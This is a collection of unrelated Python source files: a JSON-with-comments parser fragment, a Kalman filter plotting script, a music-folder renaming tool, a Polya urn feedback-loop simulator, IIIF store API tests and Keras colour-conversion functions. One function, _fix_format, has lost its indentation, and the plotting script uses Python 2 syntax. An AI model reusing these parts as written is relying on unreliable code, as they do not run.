            if len(line) == 0:
                continue
            # Skip single line comments
            if line.startswith(COMMENT_PREFIX):
                continue
            # Mark the start of a multiline comment
            # Not skipping, to identify single line comments using multiline
            # comment tokens, like /***** Comment *****/
            if line.startswith(MULTILINE_START):
                is_multiline = True
            # Skip a line of multiline comments
            if is_multiline:
                # Mark the end of a multiline comment
                if line.endswith(MULTILINE_END):
                    is_multiline = False
                continue
            # Replace the multi line data token to the JSON valid one
            if LONG_STRING in line:
                line = line.replace(LONG_STRING, '"')
            standard_json += line + " " * keep_trail_space
        # Removing non-standard trailing commas
        standard_json = standard_json.replace(",]", "]")
        standard_json = standard_json.replace(",}", "}")
        return standard_json

    # Walks the json object and subs template strings with pointed value
    def _templatesub(self, obj):
        """Recursively substitute ``{{pointer}}`` templates inside string
        values of ``obj`` (dict or list); scalars are left untouched."""
        # Gets items for iterables
        if isinstance(obj, dict):
            items = obj.items()
        elif isinstance(obj, list):
            items = enumerate(obj)
        else:
            # Scalar leaf (or non-container JSON root): nothing to walk.
            # The original fell through to ``for ... in None`` and raised
            # TypeError when loads() parsed a bare scalar document.
            return
        # Walks the iterable
        for key, subobj in items:
            # If subobj is another iterable, recurse
            if isinstance(subobj, (dict, list)):
                self._templatesub(subobj)
            # If it is a string, substitute every template match with the
            # pointed value (or "") and write the result back to the parent
            elif isinstance(subobj, str):
                obj[key] = TEMPLATE_RE.sub(self._repl_getvalue, subobj)

    # Replacement function: the match carries the JSON Pointer
    def _repl_getvalue(self, match):
        """re.sub callback: resolve the pointer against the root object and
        return the pointed string, or "" when extraction/validation fails."""
        try:
            # Extracts the pointed value from the root object
            value = extract(self.obj, match[1])
            # If it's not a string, it's not valid
            if not isinstance(value, str):
                raise ValueError("Not a string: {}".format(value))
        except (ExtractError, ValueError) as e:
            # Sets value to empty string
            value = ""
            print(e)
        return value
##########################################################################################################################################
|
<reponame>patricknaughton01/RoboticSystemsBook<filename>figures/perception/randomwalk.py<gh_stars>100-1000
import matplotlib.pyplot as plt
import numpy as np
from kalman import *
def kf_trace(F, g, P, H, j, Q, Xmean, Xvar, Z):
    """Run a Kalman filter along the observation sequence ``Z``.

    Scalar arguments are promoted to 1-element numpy vectors / 1x1 matrices
    so callers can pass plain numbers for 1-D problems.  ``H`` of None means
    "no measurement model": only the prediction step is applied.

    Returns (means, covariances), each of length ``len(Z) + 1`` and starting
    with the prior ``(Xmean, Xvar)``.
    """
    def _mat(v):
        # promote a scalar to a 1x1 matrix
        return v if isinstance(v, np.ndarray) else np.array([[v]])

    def _vec(v):
        # promote a scalar to a length-1 vector
        return v if isinstance(v, np.ndarray) else np.array([v])

    F, P, Xvar = _mat(F), _mat(P), _mat(Xvar)
    g, Xmean = _vec(g), _vec(Xmean)
    if H is not None:
        H, Q = _mat(H), _mat(Q)
        j = _vec(j)
    cur_mean, cur_cov = Xmean, Xvar
    res_mean = [cur_mean]
    res_cov = [cur_cov]
    for z in Z:
        z = _vec(z)
        cur_mean, cur_cov = kalman_filter_predict(cur_mean, cur_cov, F, g, P)
        if H is not None:
            cur_mean, cur_cov = kalman_filter_update(cur_mean, cur_cov, F, g, P, H, j, Q, z)
        res_mean.append(cur_mean)
        res_cov.append(cur_cov)
    return res_mean, res_cov
# Simulation parameters
T = 100                         # number of time steps
N = 20                          # number of random walks in the left panel
dt = 0.1                        # time step size
motion_noise_magnitude = 1.0    # std of the process (motion) noise
noise_magnitude = 0.3           # std of the observation noise
fig1 = plt.figure(figsize=(10,4))
# Left panel: N random walks plus the KF predictive distribution
ax1 = fig1.add_subplot(1, 2, 1)
ax1.set_xlabel("Time")
ax1.set_ylabel("State")
ax1.set_ylim(-3,3)
ax1.set_xlim(0,10)
x = np.array(range(T))*dt
for i in xrange(N):
    eps = np.random.normal(size=T)*motion_noise_magnitude
    y = np.cumsum(eps*dt)
    ax1.plot(x,y)
# Prediction-only KF trace (H=None: no measurement model); uses the last
# sampled eps as the input sequence
y,yvar = kf_trace(F=1,g=0,P=motion_noise_magnitude*dt**2,H=None,j=None,Q=noise_magnitude**2,Xmean=0,Xvar=0,Z=eps)
y = np.array([yi[0] for yi in y])
yvar = np.array([yi[0,0] for yi in yvar])
kf_pred, = ax1.plot(x,y[:-1],label="KF prediction")
# 2-sigma band around the prediction
ax1.plot(x,y[:-1]+2.0*np.sqrt(yvar)[:-1],label="KF prediction + 2*std",lw=0.5,color='k',linestyle='--')
ax1.plot(x,y[:-1]-2.0*np.sqrt(yvar)[:-1],label="KF prediction + 2*std",lw=0.5,color='k',linestyle='--')
ax1.legend(handles=[kf_pred])
# Right panel: KF estimate of a sinusoid from noisy observations
ax2 = fig1.add_subplot(1, 2, 2)
ax2.set_xlabel("Time")
ax2.set_ylabel("State")
ax2.set_ylim(-3,3)
ax2.set_xlim(0,10)
# ground truth is a slow sinusoid; observations add Gaussian noise
y_truth = np.sin(np.array(range(T))*dt*0.5)*1.0
x = np.array(range(T))*dt
z = y_truth + np.random.normal(size=T)*noise_magnitude
y,yvar = kf_trace(F=1,g=0,P=motion_noise_magnitude*dt**2,H=1,j=0,Q=noise_magnitude**2,Xmean=0,Xvar=0,Z=z)
y = np.array([yi[0] for yi in y])
yvar = np.array([yi[0,0] for yi in yvar])
# compare raw-observation error against the filtered estimate's error
Zmse = np.sqrt(np.sum((z-y_truth)**2))
KFmse = np.sqrt(np.sum((y[:-1]-y_truth)**2))
print "Z MSE",Zmse
print "KF MSE",KFmse
print "Reduction (%)",(Zmse-KFmse)/Zmse*100
ground_truth, = ax2.plot(x,y_truth,label="Ground truth",color='k')
obs = ax2.scatter(x,z,label="Observations",color='gray',s=9)
kf_estimate, = ax2.plot(x,y[:-1],label="KF estimate")
ax2.plot(x,y[:-1]+2.0*np.sqrt(yvar)[:-1],label="KF estimate + 2*std",lw=0.5,color='k',linestyle='--')
ax2.plot(x,y[:-1]-2.0*np.sqrt(yvar)[:-1],label="KF estimate + 2*std",lw=0.5,color='k',linestyle='--')
ax2.legend(handles=[ground_truth,obs,kf_estimate])
plt.show()
|
<reponame>goofus/smoked-salmon
import os
import re
import shutil
from copy import copy
from string import Formatter
import click
from salmon import config
from salmon.common import strip_template_keys
from salmon.constants import (
BLACKLISTED_CHARS,
BLACKLISTED_FULLWIDTH_REPLACEMENTS,
)
from salmon.errors import UploadError
def rename_folder(path, metadata, check=True):
    """
    Create a revised folder name from the new metadata and present it to the
    user. Have them decide whether or not to accept the folder name.
    Then offer them the ability to edit the folder name in a text editor
    before the renaming occurs.

    When ``check`` is False the rename (and any overwrite of an existing
    target) happens without prompting.  Returns the final path.
    """
    old_base = os.path.basename(path)
    new_base = generate_folder_name(metadata)
    if check:
        click.secho("\nRenaming folder...", fg="cyan", bold=True)
        click.echo(f"Old folder name : {old_base}")
        click.echo(f"New pending folder name: {new_base}")
        if not click.confirm(
            click.style(
                "\nWould you like to replace the original folder name?",
                fg="magenta",
                bold=True,
            ),
            default=True,
        ):
            # user declined: keep the original path untouched
            return path
        # let the user hand-tune the generated name in an editor
        new_base = _edit_folder_interactive(new_base)
    new_path = os.path.join(os.path.dirname(path), new_base)
    if os.path.isdir(new_path) and old_base != new_base:
        # target already exists; with check off it is replaced silently
        if not check or click.confirm(
            click.style(
                "A folder already exists with the new folder name, would you like to replace it?",
                fg="magenta",
                bold=True,
            ),
            default=True,
        ):
            shutil.rmtree(new_path)
        else:
            raise UploadError("New folder name already exists.")
    new_path_dirname = os.path.dirname(new_path)
    if not os.path.exists(new_path_dirname):
        os.makedirs(new_path_dirname)
    os.rename(path, new_path)
    click.secho(f"Renamed folder to {new_base}.", fg="yellow")
    return new_path
def generate_folder_name(metadata):
    """Fill the configured folder-name template from ``metadata``.

    Template keys with no (or falsy) metadata value are stripped from the
    template; the remaining values are format-fixed and sanitized of
    blacklisted filesystem characters before substitution.
    """
    meta = {**metadata, "artists": _compile_artist_str(metadata["artists"])}
    template = config.FOLDER_TEMPLATE
    keys = [field for _, field, _, _ in Formatter().parse(template) if field]
    for field in list(keys):
        if not meta.get(field):
            template = strip_template_keys(template, field)
            keys.remove(field)
    fixed = _fix_format(meta, keys)
    substitutions = {field: _sub_illegal_characters(fixed[field]) for field in keys}
    return template.format(**substitutions)
def _compile_artist_str(artist_data):
    """Create a string to represent the main artists of the release.

    Falls back to the configured "various artists" word when there are more
    main artists than the configured threshold; otherwise joins the sorted
    names with " & " (two or fewer, none containing "&") or ", ".
    """
    mains = [name for name, importance in artist_data if importance == "main"]
    if len(mains) > config.VARIOUS_ARTIST_THRESHOLD:
        return config.VARIOUS_ARTIST_WORD
    use_comma = len(mains) > 2 or "&" in "".join(mains)
    separator = ", " if use_comma else " & "
    return separator.join(sorted(mains))
def _sub_illegal_characters(stri):
    """Sanitize ``stri`` for use in a folder name: optionally map blacklisted
    characters to their fullwidth equivalents, then replace any remaining
    blacklisted characters with the configured substitution."""
    text = str(stri)
    if config.FULLWIDTH_REPLACEMENTS:
        for bad, replacement in BLACKLISTED_FULLWIDTH_REPLACEMENTS.items():
            text = text.replace(bad, replacement)
    return re.sub(BLACKLISTED_CHARS, config.BLACKLISTED_SUBSTITUTION, text)
def _fix_format(metadata, keys):
"""
Add abbreviated encoding to format key when the format is not 'FLAC'.
Helpful for 24 bit FLAC and MP3 320/V0 stuff.
So far only 24 bit FLAC is supported, when I fix the script for MP3 i will add MP3 encodings.
"""
sub_metadata = copy(metadata)
if "format" in keys:
if metadata["format"] == "FLAC" and metadata["encoding"] == "24bit Lossless":
sub_metadata["format"] = "24bit FLAC"
elif metadata["format"] == "MP3":
enc = re.sub(r" \(VBR\)", "", metadata["encoding"])
sub_metadata["format"] = f"MP3 {enc}"
if metadata["encoding_vbr"]:
sub_metadata["format"] += " (VBR)"
elif metadata["format"] == "AAC":
enc = re.sub(r" \(VBR\)", "", metadata["encoding"])
sub_metadata["format"] = f"AAC {enc}"
if metadata["encoding_vbr"]:
sub_metadata["format"] += " (VBR)"
return sub_metadata
def _edit_folder_interactive(foldername):
    """Allow the user to edit the pending folder name in a text editor.

    Returns the accepted name: the original ``foldername`` when the user is
    satisfied (or aborts the editor), otherwise the edited name with
    whitespace and newlines stripped.  Exits the process if the user gives
    up after entering invalid characters.
    """
    if not click.confirm(
        click.style(
            "Is the new folder name acceptable? ([n] to edit)", fg="magenta", bold=True
        ),
        default=True,
    ):
        newname = click.edit(foldername)
        while True:
            if newname is None:
                # editor aborted without saving: keep the generated name
                return foldername
            elif re.search(BLACKLISTED_CHARS, newname):
                if not click.confirm(
                    click.style(
                        "Folder name contains invalid characters, retry?",
                        fg="magenta",
                        bold=True,
                    ),
                    default=True,
                ):
                    exit()
            else:
                # strip stray whitespace/newlines the editor may introduce
                return newname.strip().replace("\n", "")
            # NOTE(review): the retry re-opens the editor on the ORIGINAL
            # generated name, not the rejected edit -- confirm intended.
            newname = click.edit(foldername)
    return foldername
|
<reponame>algofairness/runaway-feedback-loops-src
#!/usr/bin/env python3
import math
import pylab
import sys
import click
from polya import *
from mpl_toolkits.mplot3d import Axes3D
import matplotlib.pyplot as plt
from matplotlib import cm
from matplotlib.ticker import LinearLocator, FormatStrFormatter
import numpy as np
def histogram(urn, ndraws, nruns, lambdaa, lambdab):
    """Histogram the final fraction of type-0 balls over ``nruns`` runs of
    ``ndraws`` draws each; a progress dot is printed every 100 runs.

    Fixes the original signature, which named the parameter ``nrunsm`` while
    the body iterated over ``nruns`` -- a NameError unless a global of that
    name happened to exist.  ``lambdaa``/``lambdab`` are unused but kept for
    the shared command signature.
    """
    x = []
    for i in range(nruns):
        urn.reset()
        # drain the draw generator; only the final state matters here
        for _ in urn.draw(ndraws):
            pass
        x.append(urn.state[0] / (urn.state[0] + urn.state[1]))
        if i % 100 == 0:
            print(".", file=sys.stderr, end='')
            sys.stderr.flush()
    print("", file=sys.stderr)
    pylab.hist(x)
def singlerun(urn, ndraws, nrunsm, lambdaa, lambdab):
    """Plot the two urn counts over a single run of ``ndraws`` draws: type 0
    in red, type 1 in black, and their total as a dashed blue line.  The
    remaining parameters are unused (shared command signature)."""
    count0, count1 = [], []
    for state in urn.draw(ndraws):
        count0.append(state[0])
        count1.append(state[1])
    pylab.plot(count0, 'r')
    pylab.plot(count1, 'k')
    totals = [a + b for a, b in zip(count0, count1)]
    pylab.plot(totals, 'b--')
def singleprob(urn, ndraws, nrunsm, lambdaa, lambdab):
    """Plot the running fraction of type-0 balls for one run and print its
    mean followed by the final urn state.  The remaining parameters are
    unused (shared command signature)."""
    count0, count1 = [], []
    for state in urn.draw(ndraws):
        count0.append(state[0])
        count1.append(state[1])
    fractions = [a / (a + b) for a, b in zip(count0, count1)]
    pylab.plot(fractions, 'r')
    print(sum(fractions) / len(fractions))
    print(urn.state)
def probplot(urn, ndraws, nruns, lambdaa, lambdab):
    """Density plot of the urn's type-0 fraction over time across ``nruns``
    runs, overlaid with the empirical mean (yellow), the fixed points of the
    expected update dynamics (red dashed), and the lambda-ratio line (green
    dashed).

    Consistency fix: uses the module's ``np`` alias throughout; the original
    referred to bare ``numpy``, which resolves only indirectly through
    ``from polya import *`` and breaks if polya stops re-exporting it.
    """
    burn_in = 0
    histo_resolution = 100
    # counts[row, t]: how many runs had fraction ~ row/histo_resolution at step t
    counts = np.zeros((histo_resolution+1, ndraws-burn_in))
    for i in range(nruns):
        urn.reset()
        for _ in urn.draw(burn_in):
            pass
        for j, state in enumerate(urn.draw(ndraws-burn_in)):
            u = state[0] / (state[0] + state[1])
            counts[100-int(u*histo_resolution), j] += 1
        if i % 100 == 0:
            print(".", file=sys.stderr, end='')
            sys.stderr.flush()
    # per-timestep mean fraction across runs
    v = (counts * np.linspace(1, 0, 101)[:, np.newaxis]).sum(axis=0) / counts.sum(axis=0)
    counts_max = counts.max(axis=0)
    counts = counts / counts_max
    pylab.imshow(counts, extent=[0, counts.shape[1], 0, 1.01],
                 aspect=ndraws, cmap=pylab.cm.gray_r)
    ((a, b), (c, d)) = urn.update_matrix
    # fixed points of the expected-update dynamics (quadratic in the fraction)
    result = np.roots([c+d-a-b, a - 2 * c - d, c])
    for r in result:
        if r >= 0 and r <= 1:
            pylab.plot([0, counts.shape[1]], [r, r], 'r--')
    pylab.plot([0, counts.shape[1]], [lambdaa / (lambdab + lambdaa), lambdaa / (lambdab + lambdaa)], 'g--')
    pylab.plot(np.arange(counts.shape[1]), v, 'y-')
    pylab.xlim([0, counts.shape[1]])
    pylab.ylim([1, 0])
    print(result)
    pylab.colorbar()
# Map sub-command names to their implementing functions.
commands = {
    "singlerun": singlerun,
    "histogram": histogram,
    "probplot": probplot,
    "singleprob": singleprob
}
# Urn class used by the simulations; the option callbacks below replace it
# with wrapped variants.
urn_class = PolyaUrn
def exponential_decay_option(click, param, exponential_decay):
    """Click callback: wrap the urn class with exponential decay when the
    option value is nonzero."""
    global urn_class
    if exponential_decay != 0.0:
        print("Setting exponential decay to %f" % exponential_decay)
        urn_class = add_exponential_decay(urn_class, exponential_decay)
def linear_surprise_option(click, param, linear_surprise):
    """Click callback: switch the urn class to linear-surprise updates."""
    global urn_class
    if linear_surprise:
        print("Setting urn to behave with linear surprise")
        urn_class = add_linear_surprise(urn_class)
def partial_surprise_option(click, param, partial_surprise):
    """Click callback: switch the urn class to partial-surprise updates."""
    global urn_class
    if partial_surprise != (None, None):
        print("Setting urn to behave with partial surprise")
        urn_class = add_partial_surprise(urn_class, partial_surprise)
def weighted_surprise_option(click, param, weighted_surprise):
    """Click callback: switch the urn class to weighted-surprise updates."""
    global urn_class
    if weighted_surprise != (None, None, None, None):
        print("Setting urn to behave with weighted surprise")
        urn_class = add_weighted_surprise(urn_class, weighted_surprise)
def sqrt_surprise_option(click, param, sqrt_surprise):
    """Click callback: switch the urn class to sqrt-surprise updates."""
    global urn_class
    if sqrt_surprise:
        print("Setting urn to behave with sqrt surprise")
        urn_class = add_sqrt_surprise(urn_class)
def poisson_option(click, param, poisson):
    """Click callback: make urn updates Poisson draws instead of deterministic."""
    global urn_class
    if poisson:
        print("Setting urn to be Poisson")
        urn_class = add_poisson_update(urn_class)
def truncation_option(click, param, truncation):
    """Click callback: cap the number of new balls added per urn update."""
    global urn_class
    if truncation is not None:
        print("Truncating urn update to %d" % truncation)
        urn_class = add_truncation(urn_class, truncation)
# 2x2 urn update matrix [[a, b], [c, d]]; mutated in place by the option
# callbacks below before main() builds the urn.
urn_params = [[1.0,0.0],[0.0,1.0]]
def mixed_option(click, param, mixed):
    """Click callback: fill the update matrix from mixed-urn (d_A, d_B, r_A, r_B)."""
    if mixed != (None, None, None, None):
        (d_a, d_b, r_a, r_b) = mixed
        urn_params[0][0] = d_a + r_a
        urn_params[0][1] = r_b
        urn_params[1][0] = r_a
        urn_params[1][1] = d_b + r_b
def set_a(click, param, a):
    """Click callback: override urn update-matrix entry a (row 0, col 0)."""
    if a is not None:
        urn_params[0][0] = a
def set_b(click, param, b):
    """Click callback: override urn update-matrix entry b (row 0, col 1)."""
    if b is not None:
        urn_params[0][1] = b
def set_c(click, param, c):
    """Click callback: override urn update-matrix entry c (row 1, col 0)."""
    if c is not None:
        urn_params[1][0] = c
def set_d(click, param, d):
    """Click callback: override urn update-matrix entry d (row 1, col 1)."""
    if d is not None:
        urn_params[1][1] = d
# Help text for the --command option; entries mirror the keys of `commands`.
command_docstring = """Commands:
- singlerun
- histogram
- probplot
- singleprob
"""
@click.command()
@click.option('--a', callback=set_a, type=float, help="Set the urn's a parameter")
@click.option('--b', callback=set_b, type=float, help="Set the urn's b parameter")
@click.option('--c', callback=set_c, type=float, help="Set the urn's c parameter")
@click.option('--d', callback=set_d, type=float, help="Set the urn's d parameter")
@click.option('--command', default="singlerun", help=command_docstring)
@click.option('--ndraws', type=int, default=2000, help="How many draws from an urn")
@click.option('--nruns', type=int, default=1000, help="How many urn runs to run")
@click.option('--nr', type=float, default=1, help="Number of red balls in urn's starting configuration")
@click.option('--nb', type=float, default=1, help="Number of black balls in urn's starting configuration")
@click.option('--lambdaa', type=float, default=0.5, help="Underlying true rate for neighborhood A (red balls)")
@click.option('--lambdab', type=float, default=0.5, help="Underlying true rate for neighborhood B (black balls)")
@click.option('--exponential_decay', callback=exponential_decay_option, type=float, default=0, help="Add exponential decay to the urn")
@click.option('--truncation', callback=truncation_option, type=int, help="Truncate the maximum number of new balls to add to urn")
@click.option('--linear_surprise', callback=linear_surprise_option, is_flag=True, help="Incorporate a linear surprise factor in urn update")
@click.option('--partial_surprise', callback=partial_surprise_option, nargs=2, type=(float, float), default=(None, None), help="Incorporate a partial surprise factor in urn update, adding only reported crimes")
@click.option('--weighted_surprise', callback=weighted_surprise_option, nargs=4, type=(float, float, float, float), default=(None, None, None, None), help="Incorporate a weighted surprise factor in urn update, adding only reported crimes")
@click.option('--sqrt_surprise', callback=sqrt_surprise_option, is_flag=True, help="Incorporate a sqrt surprise factor in urn update")
@click.option('--poisson', callback=poisson_option, is_flag=True, help="urn updates are draws from a poisson instead of deterministic")
@click.option('--mixed', callback=mixed_option, nargs=4, type=(float, float, float, float), default=(None, None, None, None), help="set parameters of a mixed urn d_A, d_B, r_B, r_B")
@click.option('--interactive', is_flag=True, help='if set, show image interactively instead of saving to file')
@click.option('--output', type=str, default="fig_out.png", help='name of output file if noninteractive')
def main(a, b, c, d, output, command, ndraws, nruns, nr, nb, lambdaa, lambdab, exponential_decay, truncation, interactive, linear_surprise, sqrt_surprise, partial_surprise, weighted_surprise, poisson, mixed):
    """Build an urn from the CLI options and run the selected plotting command.

    Most configuration happens in the option callbacks above, which mutate the
    module-level `urn_class` and `urn_params` during option parsing, before
    this body runs.
    """
    print("Urn starting state: %s" % ((nr, nb),))
    print("Urn parameters: %s" % urn_params)
    urn = urn_class((nr, nb), urn_params)
    commands[command](urn, ndraws, nruns, lambdaa, lambdab)
    # Show the figure interactively or write it to disk.
    if interactive:
        pylab.show()
    else:
        pylab.savefig(output)
if __name__ == "__main__":
    main()
|
import copy
import json
import pytest
import requests
# Base path of the iiif_store API under test.
app_endpoint = "api/iiif_store"
test_headers = {"Content-Type": "application/json", "Accept": "application/json"}
# Shared mutable state: these tests run in file order and pass the created
# manifest UUID forward through this dict.
test_data_store = {}
def test_iiif_store_api_root_get(http_service):
    """The API root responds 200 OK."""
    response = requests.get(f"{http_service}/{app_endpoint}", headers=test_headers)
    assert response.status_code == 200
def test_iiif_store_api_iiif_list_empty(http_service):
    """Listing IIIF resources before any are created returns an empty page."""
    test_endpoint = "iiif"
    status = 200
    response = requests.get(
        f"{http_service}/{app_endpoint}/{test_endpoint}", headers=test_headers
    )
    assert response.status_code == status
    response_json = response.json()
    assert response_json.get("count") == 0
    # Fix: `is None`, not `== None` (PEP 8: comparisons to singletons).
    assert response_json.get("next") is None
    assert response_json.get("previous") is None
    assert response_json.get("results") == []
def test_iiif_store_api_iiif_create_manifest(http_service, test_iiif3_manifest):
    """POSTing a manifest stores it, rewrites its id, and returns 201."""
    payload = {
        "iiif_json": test_iiif3_manifest,
        "iiif_type": "Manifest",
    }
    response = requests.post(
        f"{http_service}/{app_endpoint}/iiif",
        headers=test_headers,
        json=payload,
    )
    assert response.status_code == 201
    body = response.json()
    assert body.get("id") is not None
    # Stash the UUID for the later list/get/delete tests.
    test_data_store["test_manifest_uuid"] = body.get("id")
    assert body.get("iiif_type") == payload.get("iiif_type").lower()
    assert body.get("original_id") == test_iiif3_manifest.get("id")
    assert body.get("iiif_json").get("id") != test_iiif3_manifest.get("id")
    assert body.get("label") == test_iiif3_manifest.get("label")
    assert (
        body.get("iiif_json").get("id")
        == f"http://localhost:8000/iiif/manifest/{test_data_store.get('test_manifest_uuid')}/"
    )
    # Apart from the rewritten id, the stored manifest matches the input.
    expected_manifest = copy.deepcopy(test_iiif3_manifest)
    expected_manifest.pop("id")
    body.get("iiif_json").pop("id")
    assert body.get("iiif_json") == expected_manifest
def test_iiif_store_api_iiif_list(http_service, test_iiif3_manifest):
    """After creation, the list endpoint returns just the manifest summary."""
    test_endpoint = "iiif"
    status = 200
    response = requests.get(
        f"{http_service}/{app_endpoint}/{test_endpoint}", headers=test_headers
    )
    assert response.status_code == status
    response_json = response.json()
    assert response_json.get("count") == 1
    # Fix: `is None`, not `== None` (PEP 8: comparisons to singletons).
    assert response_json.get("next") is None
    assert response_json.get("previous") is None
    assert len(response_json.get("results")) == 1
    manifest = response_json["results"][0]
    assert manifest.get("id") == test_data_store.get("test_manifest_uuid")
    assert manifest.get("iiif_type") == "manifest"
    assert manifest.get("original_id") == test_iiif3_manifest.get("id")
    assert manifest.get("label") == test_iiif3_manifest.get("label")
    assert manifest.get("thumbnail") == test_iiif3_manifest.get("thumbnail")
    # The list serializer omits the full IIIF JSON body.
    assert manifest.get("iiif_json") is None
def test_iiif_store_api_iiif_get(http_service, test_iiif3_manifest):
    """Fetching one manifest returns full metadata plus the rewritten JSON."""
    uuid = test_data_store.get("test_manifest_uuid")
    response = requests.get(
        f"{http_service}/{app_endpoint}/iiif/{uuid}", headers=test_headers
    )
    assert response.status_code == 200
    body = response.json()
    assert body.get("id") == uuid
    assert body.get("iiif_type") == "manifest"
    assert body.get("original_id") == test_iiif3_manifest.get("id")
    assert body.get("label") == test_iiif3_manifest.get("label")
    assert body.get("thumbnail") == test_iiif3_manifest.get("thumbnail")
    # The stored JSON matches the input except for the rewritten id.
    expected_manifest = copy.deepcopy(test_iiif3_manifest)
    expected_manifest.pop("id")
    rewritten_id = body.get("iiif_json").pop("id")
    assert rewritten_id == f"http://localhost:8000/iiif/manifest/{uuid}/"
    assert body.get("iiif_json") == expected_manifest
def test_iiif_store_public_iiif_list(http_service, test_iiif3_manifest):
    """The public list endpoint hides internal ids and the full JSON."""
    test_endpoint = "iiif"
    status = 200
    response = requests.get(f"{http_service}/{test_endpoint}", headers=test_headers)
    assert response.status_code == status
    response_json = response.json()
    assert response_json.get("count") == 1
    # Fix: `is None`, not `== None` (PEP 8: comparisons to singletons).
    assert response_json.get("next") is None
    assert response_json.get("previous") is None
    assert len(response_json.get("results")) == 1
    manifest = response_json["results"][0]
    assert manifest.get("iiif_type") == "manifest"
    assert manifest.get("label") == test_iiif3_manifest.get("label")
    assert manifest.get("thumbnail") == test_iiif3_manifest.get("thumbnail")
    # Internal fields are not exposed publicly.
    assert manifest.get("id") is None
    assert manifest.get("iiif_json") is None
    assert manifest.get("original_id") is None
def test_iiif_store_public_iiif_get(http_service, test_iiif3_manifest):
    """The public manifest endpoint serves the stored JSON with its new id."""
    uuid = test_data_store.get("test_manifest_uuid")
    response = requests.get(f"{http_service}/iiif/manifest/{uuid}", headers=test_headers)
    assert response.status_code == 200
    body = response.json()
    expected_manifest = copy.deepcopy(test_iiif3_manifest)
    expected_manifest.pop("id")
    assert body.pop("id") == f"http://localhost:8000/iiif/manifest/{uuid}/"
    assert body == expected_manifest
def test_iiif_store_api_iiif_delete(http_service):
    """DELETE removes the manifest; a follow-up GET returns 404."""
    test_endpoint = f"iiif/{test_data_store.get('test_manifest_uuid')}"
    url = f"{http_service}/{app_endpoint}/{test_endpoint}"
    delete_response = requests.delete(url, headers=test_headers)
    assert delete_response.status_code == 204
    get_after_delete = requests.get(url, headers=test_headers)
    assert get_after_delete.status_code == 404
|
<reponame>alexharvill/colorex
# Copyright 2021 <NAME>
# SPDX-License-Identifier: Apache-2.0
'colorex keras layers'
import tensorflow.keras as keras
import tensorflow.keras.backend as K
from colorex.cex_constants import (
REC_709_LUMA_WEIGHTS,
MAX_COMPONENT_VALUE,
SMALL_COMPONENT_VALUE,
XYZ_D65_2A_WHITEPOINT,
M_RGB_TO_XYZ_T,
M_XYZ_TO_RGB_T,
M_RGB_TO_YCBCR_T,
M_YCBCR_TO_RGB_T,
YCBCR_MIN,
YCBCR_YMAX,
YCBCR_CMAX,
YCBCR_OFFSET,
)
from colorex.cex_constants import S
import numpy as np
def srgb_to_rgb(srgb):
    'convert from a gamma 2.4 color space to linear rgb'
    # Clamp to the representable range before applying the transfer function.
    srgb = K.clip(srgb, SMALL_COMPONENT_VALUE, MAX_COMPONENT_VALUE)
    # Per-element masks select the linear segment (<= 0.04045) or the
    # exponential segment of the sRGB EOTF; exactly one mask is 1 per element.
    linear_mask = K.cast(srgb <= 0.04045, dtype='float32')
    exponential_mask = K.cast(srgb > 0.04045, dtype='float32')
    linear_pixels = srgb / 12.92
    exponential_pixels = K.pow((srgb + 0.055) / 1.055, 2.4)
    return linear_pixels * linear_mask + exponential_pixels * exponential_mask
def rgb_to_srgb(rgb):
    'convert from linear rgb to a gamma 2.4 color space'
    # Clamp to the representable range before applying the transfer function.
    rgb = K.clip(rgb, SMALL_COMPONENT_VALUE, MAX_COMPONENT_VALUE)
    # Inverse sRGB EOTF: linear below 0.0031308, gamma 1/2.4 above.
    linear_mask = K.cast(rgb <= 0.0031308, dtype='float32')
    exponential_mask = K.cast(rgb > 0.0031308, dtype='float32')
    linear_pixels = rgb * 12.92
    exponential_pixels = 1.055 * K.pow(rgb, 1.0 / 2.4) - 0.055
    return linear_pixels * linear_mask + exponential_pixels * exponential_mask
def rgb_to_xyz(rgb):
    'convert linear (gamma 1.0) RGB to XYZ via the transposed matrix'
    matrix = K.constant(M_RGB_TO_XYZ_T)
    return K.dot(rgb, matrix)
def xyz_to_rgb(xyz):
    'convert XYZ to linear (gamma 1.0) RGB via the transposed matrix'
    matrix = K.constant(M_XYZ_TO_RGB_T)
    return K.dot(xyz, matrix)
def xyz_to_lab(xyz):
    'convert from a CIEXYZ space to CIELa*b*'
    # Normalize by the D65 2-degree reference white.
    xyz = xyz / K.constant(XYZ_D65_2A_WHITEPOINT)
    xyz = K.clip(xyz, SMALL_COMPONENT_VALUE, MAX_COMPONENT_VALUE)
    epsilon = 0.008856 #(6.0 / 29.0)**3 # use hardcoded value to match skimage for validation
    # Piecewise f(t): linear below epsilon, cube root above.
    linear_mask = K.cast(xyz <= epsilon, dtype='float32')
    cuberoot_mask = K.cast(xyz > epsilon, dtype='float32')
    linear_pixels = 7.787 * xyz + 16.0 / 116.0
    cuberoot_pixels = K.pow(xyz, 1.0 / 3.0)
    xyz = linear_pixels * linear_mask + cuberoot_pixels * cuberoot_mask
    x, y, z = xyz[..., 0], xyz[..., 1], xyz[..., 2]
    # Vector scaling
    L = (116.0 * y) - 16.0
    a = 500.0 * (x - y)
    b = 200.0 * (y - z)
    return K.stack([L, a, b], axis=-1)
def lab_to_xyz(lab):
    'convert from lab to xyz color space assuming a D65 whitepoint + 2deg angle'
    l, a, b = lab[..., 0], lab[..., 1], lab[..., 2]
    # Invert the L/a/b scaling back to the piecewise-transformed x, y, z.
    y = (l + 16.0) / 116.0
    x = (a / 500.0) + y
    z = y - (b / 200.0)
    # Negative z has no physical meaning; clamp before inverting f(t).
    z = K.clip(z, 0.0, 1e20)
    xyz = K.stack([x, y, z], axis=-1)
    epsilon = 6.0 / 29.0
    # Inverse piecewise f(t): linear below epsilon, cube above.
    linear_mask = K.cast(xyz < epsilon, dtype='float32')
    cube_mask = K.cast(xyz >= epsilon, dtype='float32')
    linear_pixels = (xyz - 16.0 / 116.) / 7.787
    cube_pixels = K.pow(xyz, 3.0)
    xyz = linear_pixels * linear_mask + cube_pixels * cube_mask
    # Rescale by the D65 2-degree reference white.
    xyz = xyz * K.constant(XYZ_D65_2A_WHITEPOINT)
    return xyz
def rgb_to_luminance(rgb, luma_weights=REC_709_LUMA_WEIGHTS):
    'luminance of a color array, or higher dim color images'
    wr, wg, wb = luma_weights[0], luma_weights[1], luma_weights[2]
    return rgb[..., 0] * wr + rgb[..., 1] * wg + rgb[..., 2] * wb
def xyz_to_xyy(XYZ):
    '''
    convert XYZ tristimulus values to xyY chromaticity
    XYZ: consistent units for each component
    xyY: normalized xy chromaticity in 0-1, Y luminance in 0-inf
